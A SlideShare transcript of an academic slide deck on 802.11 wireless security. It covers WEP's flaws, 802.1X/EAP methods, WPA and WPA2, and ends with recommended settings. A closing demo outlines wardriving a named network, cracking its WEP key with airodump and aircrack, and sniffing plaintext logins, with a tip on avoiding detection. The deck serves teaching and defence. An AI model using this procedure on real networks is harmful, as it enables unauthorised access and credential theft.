SlideShare a Scribd company logo
1 of 63
Download to read offline
Wireless Security 
802.11 With a focus on Security 
by Brian Lee 
Takehiro Takahashi
Survey (1) 
 Who has not used wireless? 
 Are you confident with your wireless 
network?
Brief Overview 
 Wireless Technology Overview 
 Architecture 
 Features 
 Wireless Security Overview 
 Built-in security features in 802.11 
 WEP insecurity 
 802.1x 
 WPA 
 WPA2 - 802.11i
GOAL 
 Understand the state of art 
 WEP is insecure 
 But we CAN make a wireless network ‘secure’
802.11Basics 
 Infrastructure Mode or Ad Hoc 
 11Mbps with 802.11b 
 feels slow….? (effective speed ~ 50%) 
 802.11 a/b/g/n : Physical Layer Spec 
 802.11i : Security Spec 
 802.11r : QoS
802.11 Built-in Features 
 802.11 frame types 
 Association Request/Response Frame 
 Beacon Frame 
 RTS/CTS Frame 
 Shared/Open Authentication 
 WEP (Layer 2 security) 
 Integrity 
 Confidentiality
SSID 
 Network identifier 
 SSID is broadcasted in a beacon frame 
 Clear Text! 
 Change it from the default 
 Cisco = tsunami 
 Linksys = linksys 
 Netgear = netgear 
 Stop broadcasting!
MAC Address Filtering 
 White-list approach 
 Does not scale 
 Frame headers are never encrypted 
 Sniffing traffic will reveal valid MAC addresses 
 Bottom line….. 
 Prevents casual hacking.. 
 Quite useless
Shared/Open Authentication (1) 
 2 ways of initiating communication 
 Shared Key 
 Open Key authentication 
 Open key Auth = No authentication 
 Shared Key Auth = requires WEP
Shared Authentication (2) 
 The challenge is generated using a PRNG used 
by WEP 
 Challenge is then encrypted using WEP key and 
sent back 
 This is bad…….. reveals the WEP key
WEP (Wired Equivalent 
Protocol) 
 Provides “Confidentiality”, and “Integrity”. 
 Uses 40/104 bits RC4 encryption + 
CRC32
WEP Encryption
64/40 and 128/104 bits 
confusion 
 IV (24bits) 
 Your WEP key: 
 5-ASCII char word = 40bits 
 13-ASCII char word = 104bits 
Security-wise, it’s really 40bits or 104bits
Problems with WEP 
 1 Static Key 
 No encryption is strong if one key is used forever 
 Key length is short (40bits) 
 Brute forcing is possible 
 104bits version exists 
 Using CRC32 
 CRC is a hash function used to produce a checksum 
 Improper use of RC4 
 IV space is too small (24bits) 
 No protection against replay attack 
 No specification on key distribution 
 Lacks scalability
CRC32 and WEP 
 CRC32 doesn’t have the cryptographic 
strength seen in MD5 or SHA1 
 Bit-flipping is possible 
 Change the data, and WEP won’t catch it 
Seems trivial….?
RC4 and WEP (1) 
 RC4 – Rivest’s Cipher 4 
 Stream Cipher 
 What is a requirement for a stream cipher? 
 Avoid key sequence collision at any cost 
 {M1 XOR RC4-Key} XOR {M2 XOR RC4-Key} 
= M1 XOR M2 
 With WEP, key sequences are repeated every 16 
million packets (2 ^ 24) 
Key sequence collision doesn’t reveal the WEP key!
RC4 and WEP (2) 
 Weak IVs reveal the WEP key 
 5% chance of guessing the portion of the seed (WEP key) 
correctly 
 FMS attack 
 2M~ packets to decrypt 40bit WEP key 
 The time needed is a linear function to the key length 
 104bit key is just as useless as 40bits key
Replay Attacks 
 Reinjection of the captured packets are 
possible 
 IV usage is not specified
Effective WEP cracking 
 KoreK attack (Aug. 2004) 
 Another statistical analysis based attack on WEP key 
 Extremely fast 
 Decrypts packets using CRC32 vulnerability 
 Possible with as little as 0.1M IVs (packets)… 
 Traditional method requires more than 2M packets 
 Accelerate it with packet injection – ARP 
A 40-bit WEP can be cracked in 10 Minutes 
Fast swapping of WEP key is no longer safe
Conclusion: WEP 
 Confidentiality 
 FMS attack 
 KoreK attack 
 Integrity 
 Bit-flipping attack 
 Authentication 
 Non-existent 
 Attacks can be completely passive 
NO MORE WEP
WEP…. 
Wired Equivalent Privacy 
Well.. More like 
What on the Earth does it Protect?
Finally…. we have solutions! 
 802.1x (Authentication) 
 per-user authentication 
 Key distribution mechanism 
 WPA (Confidentiality, Integrity) 
 Subset of 802.11i 
 2 forms 
 802.1x Auth + TKIP (Enterprise mode) 
 Pre-shared Key + TKIP 
 WPA2 – 802.11i 
 WPA2 is the implementation of 802.11i 
 Uses AES-CCMP
802.1x (Authentication) 
WPA 
WPA2 (802.11i)
802.1X 
 802.1X is a port-based, layer 2 authentication 
framework 
 Not limited wireless networks 
 Uses EAP for implementation 
 End-result 
 A WEP key for WEP 
 A seed for an encryption key used in WPA/WPA2 
802.1X is not an alternative to WEP
802.1x authentication
Extensible Authentication Protocol 
(EAP) 
 Authentication Framework 
 runs on the different layer than 802.1x 
 Very flexible 
 RADIUS is de-facto 
 a server for remote user authentication and 
accounting
Implementations 
 EAP methods adopted in WPA/WPA2 
 EAP-MD5 
 EAP-LEAP 
 EAP-TLS 
 EAP-TTLS 
 PEAP
EAP-MD5 
 EAP-MD5 is a simple EAP implementation 
 Uses and MD5 hash of a username and 
password that is sent to the RADIUS 
server 
 Authenticates only one way 
 Man in the middle attack 
 Bottom line: Not recommended
LEAP (EAP-Cisco) 
 Like EAP-MD5, it uses a Login/Password 
scheme that it sends to the RADIUS server 
 Each user gets a dynamically generated one 
time key upon login 
 Authenticates client to AP and vice versa 
 Only guaranteed to work with Cisco wireless 
clients 
 Broken – ASLEAP by Joshua Wright 
 Dictionary attack
EAP-TLS by Microsoft 
 Instead of a username/password scheme, EAP-TLS 
uses certificate based authentication 
 Two way authentication 
 Uses TLS (Transport Layer Security) to pass the 
PKI (Public Key Infrastructure) information to 
RADIUS server 
 Compatible with many OS’s 
 Harder to implement and deploy because PKI for 
clients are also required
PEAP by Microsoft and Cisco 
 A more elegant solution! 
 Very similar to EAP-TLS except that the client 
does not have to authenticate itself with the 
server using a certificate, instead it can use a 
login/password based scheme 
 Much easier to setup, does not necessarily 
require a PKI 
 Currently works natively with Windows XP SP1, 
and OSX. 802.1x supplicant exists for linux
WPA (Wi-Fi Protected Access) 
 Subset of 802.11i 
 Confidentiality 
 Fix flawed encryption mechanism 
 TKIP: Per-packet dynamic key mechanism 
 Integrity 
 Upgradeability 
 Software / Firmware Upgrade
WPA Mechanism 
1. Confirmation of association capability 
2. Authentication by 802.1x or PSK 
3. 4-way handshake 
4. Encryption using TKIP 
Very Different from WEP which took care of 
“everything”
802.1x Authentication (recap)
4 Way Handshake and PTK
802.1x Authentication + PMK 
 Security level can be selected 
 Pairwise Master Key (PMK) is a seed for 
temporal key generation used in 
encryption 
 PMK is generated based on the user 
authentication result
4 Way Handshake and PTK 
 PTK (512bits) splits in 4 ways 
 Part of PTK is used to generate the 
encryption key (WEP equivalent) in the 
next phase
4 Way Handshake and PTK
TKIP (Temporal Key Integrity 
Protocol) 
 The heart of WPA encryption mechanism 
 Expands IV space (24  48bits) 
 IV sequence is specified 
 Generate a key which conforms to WEP 
 A fresh key is used for every 16M packets 
 Michael 
 Very cheap integrity checker for MAC 
addresses and DATA
WPA-PSK 
 For home / SOHO use 
 Removes 802.1x authentication 
 Pre-shared Key + TKIP 
 Weak against passive dictionary attack 
 Attacks exist - WPA Cracker 
Still MUCH better than WEP
WPA Security Insight 
 No effective attacks found on WPA + 802.1x 
 WPA-PSK should be used with care
WPA2 - 802.11i 
 The long-awaited security standard for 
wireless, ratified in June 2004 
 Better encryption: AES-CCMP 
 Key-caching (optional) 
 Pre-authentication (optional) 
 Hardware manufactured before 2002 is 
likely to be unsupported: too weak
PMK Key-Caching 
 Skips re-entering of the user credential by 
storing the host information on the network 
 Allows client to become authenticated with 
an AP before moving to it 
 Useful in encrypted VoIP over Wi-Fi 
 Fast Roaming
Conclusion 
 WEP = Dead Meat 
 WPA-PSK = Potentially Insecure 
 WPA + 802.1x (Secure EAP) = Secure 
 WPA2-PSK = Potentially Insecure 
 WPA2 + 802.1x = Very Secure
Suggested Practice 
 Hide SSID 
 Do NOT use WEP 
 Use WPA-PSK with a good pass-phrase 
 or Use WPA with 802.1x if possible 
 Get WPA2 certified product for your next 
purchase
tinyPEAP (1) 
 A self contained PEAP enabled RADIUS 
server 
 Currently available in Linksys 
WRT54G/GS router and Win32 binary 
 Native Windows XP SP1 support 
 Web-based user management 
 The easiest and the most secure solution 
available in consumer level
tinyPEAP (2)
tinyPEAP (3)
Survey (2) 
 Ready to reconfigure your wireless 
network?
Links to the tools used: 
 Airsnort 
http://airsnort.shmoo.com 
 Netstumbler 
http://www.netstumbler.com 
 Ethereal 
http://www.ethereal.com 
 tinyPEAP 
http://www.tinypeap.com
Papers and Wireless Security Web 
Pages 
 Weaknesses in the Key Scheduling Algorithm of 
RC4 
 The Unofficial 802.11 Security Web Page 
 Wireless Security Blackpaper 
 The IEEE 802.11 specifications (includes WEP 
spec) 
 Paper on detecting Netstumbler and similar 
programs 
 Further reading on upcoming 802.11 variations 
 Assorted 802.11 related crypto algorithms 
written in ANSI C
An exercise in wireless 
insecurity 
 Tools used: 
 Laptop w/ 802.11a/b/g card 
 GPS 
 Netstumbler 
 Aircrack (or any WEP cracking tool) 
 Ethereal 
 the car of your choice
Step1: Find networks to attack 
 An attacker would first use Netstumbler to 
drive around and map out active wireless 
networks 
 Using Netstumbler, the attacker locates a 
strong signal on the target WLAN 
 Netstumbler not only has the ability to 
monitor all active networks in the area, but 
it also integrates with a GPS to map AP’s
WarDriving
Step 2: Choose the network to 
attack 
 At this point, the attacker has chosen his 
target; most likely a business 
 Netstumbler can tell you whether or not 
the network is encrypted 
 Also, start Ethereal to look for additional 
information. 
This time……. 
Your target is GTwireless
Step3: Analyzing the Network 
 WLAN has no broadcasted SSID 
 Netstubmler tells me that SSID is 
GTwireless 
 Multiple access points 
 Open authentication method 
 WLAN is encrypted with 40bit WEP 
 WLAN is not using 802.1X (WEB-auth)
Step4: Cracking the WEP key 
 Attacker sets NIC drivers to Monitor Mode 
 Begins capturing packets with Airodump 
 Airodump quickly lists the available 
network with SSID and starts capturing 
packets. 
 After a few hours of airodump session, 
launch aircrack to start cracking! 
 WEP key for GTwireless is revealed!
Step5: Sniffing the network 
 Once the WEP key is cracked and the NIC 
is configured appropriately, the attacker is 
assigned an IP, and can access the WLAN 
 However, a secure proxy with an SSL 
enabled web based login prevents access 
to the rest of network and the Internet 
 Attacker begins listening to traffic with 
Ethereal
Step6: Sniffing continued… 
 Sniffing a WLAN is very fruitful because 
everyone on the WLAN is a peer, therefore 
you can sniff every wireless client 
 Listening to connections with plain text 
protocols (in this case FTP, POP, Telnet) to 
servers on the wired LAN yielded 2 usable 
logins within 1.5hrs
What was accomplished? 
 Complete access to the WLAN 
 Complete access to the wired LAN 
 Complete access to the internet 
 Access to servers on the wired LAN using 
the sniffed accounts 
 Some anonymity. Usage of Netstumbler 
and other network probing devices can be 
detected. Skip that step if possible.
Other possibilities 
 Instead of sniffing a valid login, the 
attacker could have exploited a known 
vulnerability in the proxy (provided there is 
one) 
 The greater risk for being noticed, 
something an attacker does not want
That’s it…the network is 
compromised 
 As long as WEP is in place, such attack is 
always possible 
 Sadly, many are less secure 
 How about yours?

More Related Content

What's hot

Cracking wpa2 psk in the cloud
Cracking wpa2 psk in the cloudCracking wpa2 psk in the cloud
Cracking wpa2 psk in the cloudFotios Lindiakos
 
Cracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksCracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksHammam Samara
 
Pentesting Wireless Networks and Wireless Network Security
Pentesting Wireless Networks and Wireless Network SecurityPentesting Wireless Networks and Wireless Network Security
Pentesting Wireless Networks and Wireless Network SecurityAyoma Wijethunga
 
Cracking wep and wpa wireless networks
Cracking wep and wpa wireless networksCracking wep and wpa wireless networks
Cracking wep and wpa wireless networksMaghan Das
 
WPA3 - What is it good for?
WPA3 - What is it good for?WPA3 - What is it good for?
WPA3 - What is it good for?Tom Isaacson
 
Wpa2 psk security measure
Wpa2 psk security measureWpa2 psk security measure
Wpa2 psk security measureShivam Singh
 
Wifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and DrinkWifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and DrinkSecurityTube.Net
 
RSA - WLAN Hacking
RSA - WLAN HackingRSA - WLAN Hacking
RSA - WLAN HackingJohn Rhoton
 
802.11 mgt-opern
802.11 mgt-opern802.11 mgt-opern
802.11 mgt-opernakruthi k
 
Hacking Wireless Networks : Null Delhi (November)
Hacking Wireless Networks : Null Delhi (November)Hacking Wireless Networks : Null Delhi (November)
Hacking Wireless Networks : Null Delhi (November)Mandeep Jadon
 
IPSec VPN & IPSec Protocols
IPSec VPN & IPSec ProtocolsIPSec VPN & IPSec Protocols
IPSec VPN & IPSec Protocols NetProtocol Xpert
 
Wireless Device and Network level security
Wireless Device and Network level securityWireless Device and Network level security
Wireless Device and Network level securityChetan Kumar S
 

What's hot (20)

Cracking wpa2 psk in the cloud
Cracking wpa2 psk in the cloudCracking wpa2 psk in the cloud
Cracking wpa2 psk in the cloud
 
Cracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksCracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless Networks
 
Pentesting Wireless Networks and Wireless Network Security
Pentesting Wireless Networks and Wireless Network SecurityPentesting Wireless Networks and Wireless Network Security
Pentesting Wireless Networks and Wireless Network Security
 
Cracking wep and wpa wireless networks
Cracking wep and wpa wireless networksCracking wep and wpa wireless networks
Cracking wep and wpa wireless networks
 
Wpa3
Wpa3Wpa3
Wpa3
 
WPA3 - What is it good for?
WPA3 - What is it good for?WPA3 - What is it good for?
WPA3 - What is it good for?
 
Wpa2 psk security measure
Wpa2 psk security measureWpa2 psk security measure
Wpa2 psk security measure
 
WPA-3: SEA and Dragonfly
WPA-3: SEA and DragonflyWPA-3: SEA and Dragonfly
WPA-3: SEA and Dragonfly
 
Wi Fi Security
Wi Fi SecurityWi Fi Security
Wi Fi Security
 
WEP
WEPWEP
WEP
 
Kracking WPA2
Kracking WPA2Kracking WPA2
Kracking WPA2
 
Attacking and Securing WPA Enterprise Networks
Attacking and Securing WPA Enterprise NetworksAttacking and Securing WPA Enterprise Networks
Attacking and Securing WPA Enterprise Networks
 
Shashank wireless lans security
Shashank wireless lans securityShashank wireless lans security
Shashank wireless lans security
 
Wifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and DrinkWifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and Drink
 
KRACK attack
KRACK attackKRACK attack
KRACK attack
 
RSA - WLAN Hacking
RSA - WLAN HackingRSA - WLAN Hacking
RSA - WLAN Hacking
 
802.11 mgt-opern
802.11 mgt-opern802.11 mgt-opern
802.11 mgt-opern
 
Hacking Wireless Networks : Null Delhi (November)
Hacking Wireless Networks : Null Delhi (November)Hacking Wireless Networks : Null Delhi (November)
Hacking Wireless Networks : Null Delhi (November)
 
IPSec VPN & IPSec Protocols
IPSec VPN & IPSec ProtocolsIPSec VPN & IPSec Protocols
IPSec VPN & IPSec Protocols
 
Wireless Device and Network level security
Wireless Device and Network level securityWireless Device and Network level security
Wireless Device and Network level security
 

Viewers also liked

Netstumbler, vistumbler, wifi inspector
Netstumbler, vistumbler, wifi inspectorNetstumbler, vistumbler, wifi inspector
Netstumbler, vistumbler, wifi inspectorRoger Espinoza
 
Chapter 10 wireless hacking [compatibility mode]
Chapter 10 wireless hacking [compatibility mode]Chapter 10 wireless hacking [compatibility mode]
Chapter 10 wireless hacking [compatibility mode]Setia Juli Irzal Ismail
 
Ettercap
EttercapEttercap
EttercapTensor
 
Ch 11: Hacking Wireless Networks
Ch 11: Hacking Wireless NetworksCh 11: Hacking Wireless Networks
Ch 11: Hacking Wireless NetworksSam Bowne
 
Wireless security presentation
Wireless security presentationWireless security presentation
Wireless security presentationMuhammad Zia
 

Viewers also liked (9)

Netstumbler, vistumbler, wifi inspector
Netstumbler, vistumbler, wifi inspectorNetstumbler, vistumbler, wifi inspector
Netstumbler, vistumbler, wifi inspector
 
Kismet
KismetKismet
Kismet
 
Chapter 10 wireless hacking [compatibility mode]
Chapter 10 wireless hacking [compatibility mode]Chapter 10 wireless hacking [compatibility mode]
Chapter 10 wireless hacking [compatibility mode]
 
The magic of ettercap
The magic of ettercapThe magic of ettercap
The magic of ettercap
 
Ettercap
EttercapEttercap
Ettercap
 
Ch 11: Hacking Wireless Networks
Ch 11: Hacking Wireless NetworksCh 11: Hacking Wireless Networks
Ch 11: Hacking Wireless Networks
 
Wardriving
WardrivingWardriving
Wardriving
 
Wireless security presentation
Wireless security presentationWireless security presentation
Wireless security presentation
 
Sniffing via dsniff
Sniffing via dsniffSniffing via dsniff
Sniffing via dsniff
 

Similar to Wireless security837

5169 wireless network_security_amine_k
5169 wireless network_security_amine_k5169 wireless network_security_amine_k
5169 wireless network_security_amine_kRama Krishna M
 
Wireless network security
Wireless network securityWireless network security
Wireless network securityVishal Agarwal
 
Wireless Security null seminar
Wireless Security null seminarWireless Security null seminar
Wireless Security null seminarNilesh Sapariya
 
4 wifi security
4 wifi security4 wifi security
4 wifi securityal-sari7
 
Hacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh JadonHacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh JadonOWASP Delhi
 
Wireless hacking and security
Wireless hacking and securityWireless hacking and security
Wireless hacking and securityAdel Zalok
 
Wireless and WLAN Secuirty, Presented by Vijay
Wireless and WLAN Secuirty, Presented by VijayWireless and WLAN Secuirty, Presented by Vijay
Wireless and WLAN Secuirty, Presented by Vijaythevijayps
 
Chapter 7 - Wireless Network Security.pptx
Chapter 7 - Wireless Network Security.pptxChapter 7 - Wireless Network Security.pptx
Chapter 7 - Wireless Network Security.pptxAmanuelZewdie4
 
DTS Solution - Wireless Security Protocols / PenTesting
DTS Solution - Wireless Security Protocols / PenTesting DTS Solution - Wireless Security Protocols / PenTesting
DTS Solution - Wireless Security Protocols / PenTesting Shah Sheikh
 
Security Issues of IEEE 802.11b
Security Issues of IEEE 802.11bSecurity Issues of IEEE 802.11b
Security Issues of IEEE 802.11bSreekanth GS
 
Security Issues of 802.11b
Security Issues of 802.11bSecurity Issues of 802.11b
Security Issues of 802.11bguestd7b627
 
Workshop on Wireless Security
Workshop on Wireless SecurityWorkshop on Wireless Security
Workshop on Wireless Securityamiable_indian
 
Sheetal - Wirelesss Hacking - ClubHack2008
Sheetal - Wirelesss Hacking - ClubHack2008Sheetal - Wirelesss Hacking - ClubHack2008
Sheetal - Wirelesss Hacking - ClubHack2008ClubHack
 
wireless lan security.ppt
wireless lan security.pptwireless lan security.ppt
wireless lan security.pptSagarBedarkar3
 
New flaws in WPA-TKIP
New flaws in WPA-TKIPNew flaws in WPA-TKIP
New flaws in WPA-TKIPvanhoefm
 
Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...
Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...
Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...IDES Editor
 

Similar to Wireless security837 (20)

Ch06 Wireless Network Security
Ch06 Wireless Network SecurityCh06 Wireless Network Security
Ch06 Wireless Network Security
 
5169 wireless network_security_amine_k
5169 wireless network_security_amine_k5169 wireless network_security_amine_k
5169 wireless network_security_amine_k
 
Wifi Security
Wifi SecurityWifi Security
Wifi Security
 
Wireless network security
Wireless network securityWireless network security
Wireless network security
 
Wireless Security null seminar
Wireless Security null seminarWireless Security null seminar
Wireless Security null seminar
 
4 wifi security
4 wifi security4 wifi security
4 wifi security
 
Hacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh JadonHacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh Jadon
 
WEP
WEPWEP
WEP
 
Wireless hacking and security
Wireless hacking and securityWireless hacking and security
Wireless hacking and security
 
Wireless and WLAN Secuirty, Presented by Vijay
Wireless and WLAN Secuirty, Presented by VijayWireless and WLAN Secuirty, Presented by Vijay
Wireless and WLAN Secuirty, Presented by Vijay
 
Wi fi security
Wi fi securityWi fi security
Wi fi security
 
Chapter 7 - Wireless Network Security.pptx
Chapter 7 - Wireless Network Security.pptxChapter 7 - Wireless Network Security.pptx
Chapter 7 - Wireless Network Security.pptx
 
DTS Solution - Wireless Security Protocols / PenTesting
DTS Solution - Wireless Security Protocols / PenTesting DTS Solution - Wireless Security Protocols / PenTesting
DTS Solution - Wireless Security Protocols / PenTesting
 
Security Issues of IEEE 802.11b
Security Issues of IEEE 802.11bSecurity Issues of IEEE 802.11b
Security Issues of IEEE 802.11b
 
Security Issues of 802.11b
Security Issues of 802.11bSecurity Issues of 802.11b
Security Issues of 802.11b
 
Workshop on Wireless Security
Workshop on Wireless SecurityWorkshop on Wireless Security
Workshop on Wireless Security
 
Sheetal - Wirelesss Hacking - ClubHack2008
Sheetal - Wirelesss Hacking - ClubHack2008Sheetal - Wirelesss Hacking - ClubHack2008
Sheetal - Wirelesss Hacking - ClubHack2008
 
wireless lan security.ppt
wireless lan security.pptwireless lan security.ppt
wireless lan security.ppt
 
New flaws in WPA-TKIP
New flaws in WPA-TKIPNew flaws in WPA-TKIP
New flaws in WPA-TKIP
 
Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...
Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...
Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...
 

More from mark scott

Network troubleshooting-guide1889
Network troubleshooting-guide1889Network troubleshooting-guide1889
Network troubleshooting-guide1889mark scott
 
Reference manual-for-the-netgear-rangemax-wireless-router-wpn8241380
Reference manual-for-the-netgear-rangemax-wireless-router-wpn8241380Reference manual-for-the-netgear-rangemax-wireless-router-wpn8241380
Reference manual-for-the-netgear-rangemax-wireless-router-wpn8241380mark scott
 
6218i2 wireless-router-users-guide2453
6218i2 wireless-router-users-guide24536218i2 wireless-router-users-guide2453
6218i2 wireless-router-users-guide2453mark scott
 
Wireless lab4902
Wireless lab4902Wireless lab4902
Wireless lab4902mark scott
 
Sip 140208055023-phpapp02
Sip 140208055023-phpapp02Sip 140208055023-phpapp02
Sip 140208055023-phpapp02mark scott
 
My freeware-shareware-programs2205
My freeware-shareware-programs2205My freeware-shareware-programs2205
My freeware-shareware-programs2205mark scott
 

More from mark scott (8)

Network troubleshooting-guide1889
Network troubleshooting-guide1889Network troubleshooting-guide1889
Network troubleshooting-guide1889
 
Reference manual-for-the-netgear-rangemax-wireless-router-wpn8241380
Reference manual-for-the-netgear-rangemax-wireless-router-wpn8241380Reference manual-for-the-netgear-rangemax-wireless-router-wpn8241380
Reference manual-for-the-netgear-rangemax-wireless-router-wpn8241380
 
6218i2 wireless-router-users-guide2453
6218i2 wireless-router-users-guide24536218i2 wireless-router-users-guide2453
6218i2 wireless-router-users-guide2453
 
Wireless lab4902
Wireless lab4902Wireless lab4902
Wireless lab4902
 
Etherfast3828
Etherfast3828Etherfast3828
Etherfast3828
 
Sip 140208055023-phpapp02
Sip 140208055023-phpapp02Sip 140208055023-phpapp02
Sip 140208055023-phpapp02
 
My freeware-shareware-programs2205
My freeware-shareware-programs2205My freeware-shareware-programs2205
My freeware-shareware-programs2205
 
S000342 t
S000342 tS000342 t
S000342 t
 

Wireless security837

  • 1. Wireless Security 802.11 With a focus on Security by Brian Lee Takehiro Takahashi
  • 2. Survey (1)  Who has not used wireless?  Are you confident with your wireless network?
  • 3. Brief Overview  Wireless Technology Overview  Architecture  Features  Wireless Security Overview  Built-in security features in 802.11  WEP insecurity  802.1x  WPA  WPA2 - 802.11i
  • 4. GOAL  Understand the state of art  WEP is insecure  But we CAN make a wireless network ‘secure’
  • 5. 802.11Basics  Infrastructure Mode or Ad Hoc  11Mbps with 802.11b  feels slow….? (effective speed ~ 50%)  802.11 a/b/g/n : Physical Layer Spec  802.11i : Security Spec  802.11r : QoS
  • 6. 802.11 Built-in Features  802.11 frame types  Association Request/Response Frame  Beacon Frame  RTS/CTS Frame  Shared/Open Authentication  WEP (Layer 2 security)  Integrity  Confidentiality
  • 7. SSID  Network identifier  SSID is broadcasted in a beacon frame  Clear Text!  Change it from the default  Cisco = tsunami  Linksys = linksys  Netgear = netgear  Stop broadcasting!
  • 8. MAC Address Filtering  White-list approach  Does not scale  Frame headers are never encrypted  Sniffing traffic will reveal valid MAC addresses  Bottom line…..  Prevents casual hacking..  Quite useless
  • 9. Shared/Open Authentication (1)  2 ways of initiating communication  Shared Key  Open Key authentication  Open key Auth = No authentication  Shared Key Auth = requires WEP
  • 10. Shared Authentication (2)  The challenge is generated using a PRNG used by WEP  Challenge is then encrypted using WEP key and sent back  This is bad…….. reveals the WEP key
  • 11. WEP (Wired Equivalent Protocol)  Provides “Confidentiality”, and “Integrity”.  Uses 40/104 bits RC4 encryption + CRC32
  • 13. 64/40 and 128/104 bits confusion  IV (24bits)  Your WEP key:  5-ASCII char word = 40bits  13-ASCII char word = 104bits Security-wise, it’s really 40bits or 104bits
  • 14. Problems with WEP  1 Static Key  No encryption is strong if one key is used forever  Key length is short (40bits)  Brute forcing is possible  104bits version exists  Using CRC32  CRC is a hash function used to produce a checksum  Improper use of RC4  IV space is too small (24bits)  No protection against replay attack  No specification on key distribution  Lacks scalability
  • 15. CRC32 and WEP  CRC32 doesn’t have the cryptographic strength seen in MD5 or SHA1  Bit-flipping is possible  Change the data, and WEP won’t catch it Seems trivial….?
  • 16. RC4 and WEP (1)  RC4 – Rivest’s Cipher 4  Stream Cipher  What is a requirement for a stream cipher?  Avoid key sequence collision at any cost  {M1 XOR RC4-Key} XOR {M2 XOR RC4-Key} = M1 XOR M2  With WEP, key sequences are repeated every 16 million packets (2 ^ 24) Key sequence collision doesn’t reveal the WEP key!
  • 17. RC4 and WEP (2)  Weak IVs reveal the WEP key  5% chance of guessing the portion of the seed (WEP key) correctly  FMS attack  2M~ packets to decrypt 40bit WEP key  The time needed is a linear function to the key length  104bit key is just as useless as 40bits key
  • 18. Replay Attacks  Reinjection of the captured packets are possible  IV usage is not specified
  • 19. Effective WEP cracking  KoreK attack (Aug. 2004)  Another statistical analysis based attack on WEP key  Extremely fast  Decrypts packets using CRC32 vulnerability  Possible with as little as 0.1M IVs (packets)…  Traditional method requires more than 2M packets  Accelerate it with packet injection – ARP A 40-bit WEP can be cracked in 10 Minutes Fast swapping of WEP key is no longer safe
  • 20. Conclusion: WEP  Confidentiality  FMS attack  KoreK attack  Integrity  Bit-flipping attack  Authentication  Non-existent  Attacks can be completely passive NO MORE WEP
  • 21. WEP…. Wired Equivalent Privacy Well.. More like What on the Earth does it Protect?
  • 22. Finally…. we have solutions!  802.1x (Authentication)  per-user authentication  Key distribution mechanism  WPA (Confidentiality, Integrity)  Subset of 802.11i  2 forms  802.1x Auth + TKIP (Enterprise mode)  Pre-shared Key + TKIP  WPA2 – 802.11i  WPA2 is the implementation of 802.11i  Uses AES-CCMP
  • 23. 802.1x (Authentication) WPA WPA2 (802.11i)
  • 24. 802.1X  802.1X is a port-based, layer 2 authentication framework  Not limited wireless networks  Uses EAP for implementation  End-result  A WEP key for WEP  A seed for an encryption key used in WPA/WPA2 802.1X is not an alternative to WEP
  • 26. Extensible Authentication Protocol (EAP)  Authentication Framework  runs on the different layer than 802.1x  Very flexible  RADIUS is de-facto  a server for remote user authentication and accounting
  • 27. Implementations  EAP methods adopted in WPA/WPA2  EAP-MD5  EAP-LEAP  EAP-TLS  EAP-TTLS  PEAP
  • 28. EAP-MD5  EAP-MD5 is a simple EAP implementation  Uses and MD5 hash of a username and password that is sent to the RADIUS server  Authenticates only one way  Man in the middle attack  Bottom line: Not recommended
  • 29. LEAP (EAP-Cisco)  Like EAP-MD5, it uses a Login/Password scheme that it sends to the RADIUS server  Each user gets a dynamically generated one time key upon login  Authenticates client to AP and vice versa  Only guaranteed to work with Cisco wireless clients  Broken – ASLEAP by Joshua Wright  Dictionary attack
  • 30. EAP-TLS by Microsoft  Instead of a username/password scheme, EAP-TLS uses certificate based authentication  Two way authentication  Uses TLS (Transport Layer Security) to pass the PKI (Public Key Infrastructure) information to RADIUS server  Compatible with many OS’s  Harder to implement and deploy because PKI for clients are also required
  • 31. PEAP by Microsoft and Cisco  A more elegant solution!  Very similar to EAP-TLS except that the client does not have to authenticate itself with the server using a certificate, instead it can use a login/password based scheme  Much easier to setup, does not necessarily require a PKI  Currently works natively with Windows XP SP1, and OSX. 802.1x supplicant exists for linux
  • 32. WPA (Wi-Fi Protected Access)  Subset of 802.11i  Confidentiality  Fix flawed encryption mechanism  TKIP: Per-packet dynamic key mechanism  Integrity  Upgradeability  Software / Firmware Upgrade
  • 33. WPA Mechanism 1. Confirmation of association capability 2. Authentication by 802.1x or PSK 3. 4-way handshake 4. Encryption using TKIP Very Different from WEP which took care of “everything”
  • 35. 4 Way Handshake and PTK
  • 36. 802.1x Authentication + PMK  Security level can be selected  Pairwise Master Key (PMK) is a seed for temporal key generation used in encryption  PMK is generated based on the user authentication result
  • 37. 4 Way Handshake and PTK  PTK (512bits) splits in 4 ways  Part of PTK is used to generate the encryption key (WEP equivalent) in the next phase
  • 38. 4 Way Handshake and PTK
  • 39. TKIP (Temporal Key Integrity Protocol)  The heart of WPA encryption mechanism  Expands IV space (24  48bits)  IV sequence is specified  Generate a key which conforms to WEP  A fresh key is used for every 16M packets  Michael  Very cheap integrity checker for MAC addresses and DATA
  • 40. WPA-PSK  For home / SOHO use  Removes 802.1x authentication  Pre-shared Key + TKIP  Weak against passive dictionary attack  Attacks exist - WPA Cracker Still MUCH better than WEP
  • 41. WPA Security Insight  No effective attacks found on WPA + 802.1x  WPA-PSK should be used with care
  • 42. WPA2 - 802.11i  The long-awaited security standard for wireless, ratified in June 2004  Better encryption: AES-CCMP  Key-caching (optional)  Pre-authentication (optional)  Hardware manufactured before 2002 is likely to be unsupported: too weak
